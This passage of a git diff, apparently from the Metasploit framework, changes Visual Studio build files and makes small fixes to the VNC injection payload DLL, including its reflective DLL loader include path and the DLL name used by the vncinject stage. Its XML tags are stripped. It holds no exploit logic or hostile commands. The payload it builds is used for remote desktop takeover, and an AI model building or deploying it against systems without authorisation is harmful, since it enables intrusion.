+ WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ StackFrameRuntimeCheck
+ MultiThreadedDebug
+ true
+
+ Level3
+ true
+ ProgramDatabase
+ Default
+
+
+ _DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)
+ 0x0809
+
+
+ /MACHINE:I386 %(AdditionalOptions)
+ ws2_32.lib;%(AdditionalDependencies)
+ true
+ type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)
+ true
+ Windows
+ false
+
+ MachineX86
+
+
+ editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+
+
+ Disabled
+ ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)
+ StackFrameRuntimeCheck
+ MultiThreadedDebug
+ true
+
+ Level3
+ true
+ ProgramDatabase
+ Default
+
+
+ _DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)
+ 0x0809
+
+
+ /MACHINE:I386 %(AdditionalOptions)
+ ws2_32.lib;%(AdditionalDependencies)
+ true
+ type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)
+ true
+ Windows
+ false
+
+ MachineX64
+
+
+ editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+ true
+ true
+ true
+
+
+ true
+ true
+ true
+ true
+
+
+ true
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/vncdll/winvnc/WinVNC.vcxproj.filters b/external/source/vncdll/winvnc/WinVNC.vcxproj.filters
new file mode 100755
index 0000000000..39f04fd58a
--- /dev/null
+++ b/external/source/vncdll/winvnc/WinVNC.vcxproj.filters
@@ -0,0 +1,527 @@
+
+
+
+
+ {804c711f-35c6-4aac-9b8a-9cf8b528de85}
+ .cpp, .c
+
+
+ {7847cf33-fe03-48ad-9a94-a8956821f343}
+ .cpp, .c
+
+
+ {a328f948-40d7-4548-9451-66b620124477}
+
+
+ {cb642898-1056-43ee-828a-40004b207331}
+
+
+ {22b4b748-5baf-4a41-9ab0-ef1d45f215aa}
+
+
+ {2a00b2f1-2b80-496f-ade2-3ac76578d435}
+
+
+ {c3a89192-29f8-4ebc-b443-1032d86966d6}
+ .h
+
+
+ {a545ae04-19cc-401a-bb0e-fd3d7aad0f60}
+
+
+ {525d33a4-2360-47f9-9e68-24f7d54d50cb}
+
+
+ {e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}
+
+
+
+
+ Source Files
+
+
+ Source Files\encoder
+
+
+ Source Files\encoder
+
+
+ Source Files\encoder
+
+
+ Source Files\encoder
+
+
+ Source Files\encoder
+
+
+ Source Files\encoder
+
+
+ Source Files\encoder
+
+
+ Source Files\omnithread
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\libjpeg
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\zlib
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+ Source Files\winvnc
+
+
+
+
+ Source Files\omnithread
+
+
+ Source Files\omnithread
+
+
+ Header Files
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\libjpeg
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\zlib
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+ Header Files\winvnc
+
+
+
+
+ Header Files\winvnc
+
+
+
\ No newline at end of file
diff --git a/external/source/vncdll/winvnc/vncDesktop.cpp b/external/source/vncdll/winvnc/vncDesktop.cpp
old mode 100644
new mode 100755
index 19a2b555c6..396163756e
--- a/external/source/vncdll/winvnc/vncDesktop.cpp
+++ b/external/source/vncdll/winvnc/vncDesktop.cpp
@@ -2906,7 +2906,7 @@ bool bDbgBmDump(
TCHAR szFileName[MAX_PATH];
sprintf(
szFileName,
- "%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
+ "%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
stm.wYear, stm.wMonth, stm.wDay,
stm.wHour, stm.wMinute, stm.wSecond,
ptr);
diff --git a/external/source/vncdll/winvnc/vncdll.cpp b/external/source/vncdll/winvnc/vncdll.cpp
old mode 100644
new mode 100755
index e8bc8dcc93..096c2a03cd
--- a/external/source/vncdll/winvnc/vncdll.cpp
+++ b/external/source/vncdll/winvnc/vncdll.cpp
@@ -15,7 +15,7 @@
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "ReflectiveLoader.c"
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
HANDLE hMessageMutex = NULL;
diff --git a/external/source/vncdll/winvnc/zlib/inffast.c b/external/source/vncdll/winvnc/zlib/inffast.c
old mode 100644
new mode 100755
index aa7f1d4d2a..90455987cb
--- a/external/source/vncdll/winvnc/zlib/inffast.c
+++ b/external/source/vncdll/winvnc/zlib/inffast.c
@@ -99,7 +99,7 @@ z_streamp z;
do {
r += s->end - s->window; /* force pointer in window */
} while (r < s->window); /* covers invalid distances */
- e = s->end - r;
+ e = (uInt)(s->end - r);
if (c > e)
{
c -= e; /* wrapped copy */
diff --git a/external/source/vncdll/winvnc/zlib/inflate.c b/external/source/vncdll/winvnc/zlib/inflate.c
old mode 100644
new mode 100755
index dfb2e867d8..ea6e9c8333
--- a/external/source/vncdll/winvnc/zlib/inflate.c
+++ b/external/source/vncdll/winvnc/zlib/inflate.c
@@ -334,7 +334,7 @@ z_streamp z;
}
/* restore */
- z->total_in += p - z->next_in;
+ z->total_in += (uLong)(p - z->next_in);
z->next_in = p;
z->avail_in = n;
z->state->sub.marker = m;
diff --git a/external/source/vncdll/winvnc/zlib/infutil.h b/external/source/vncdll/winvnc/zlib/infutil.h
old mode 100644
new mode 100755
index 4401df82fc..1804eb984f
--- a/external/source/vncdll/winvnc/zlib/infutil.h
+++ b/external/source/vncdll/winvnc/zlib/infutil.h
@@ -64,7 +64,7 @@ struct inflate_blocks_state {
/* defines for inflate input/output */
/* update pointers and return */
#define UPDBITS {s->bitb=b;s->bitk=k;}
-#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
+#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
#define UPDOUT {s->write=q;}
#define UPDATE {UPDBITS UPDIN UPDOUT}
#define LEAVE {UPDATE return inflate_flush(s,z,r);}
diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb
index 81d278da64..deca1e26d7 100644
--- a/modules/payloads/stages/windows/vncinject.rb
+++ b/modules/payloads/stages/windows/vncinject.rb
@@ -30,6 +30,6 @@ module Metasploit3
end
def library_path
- File.join(Msf::Config.data_directory, "vncdll.dll")
+ File.join(Msf::Config.data_directory, "vncdll.x86.dll")
end
end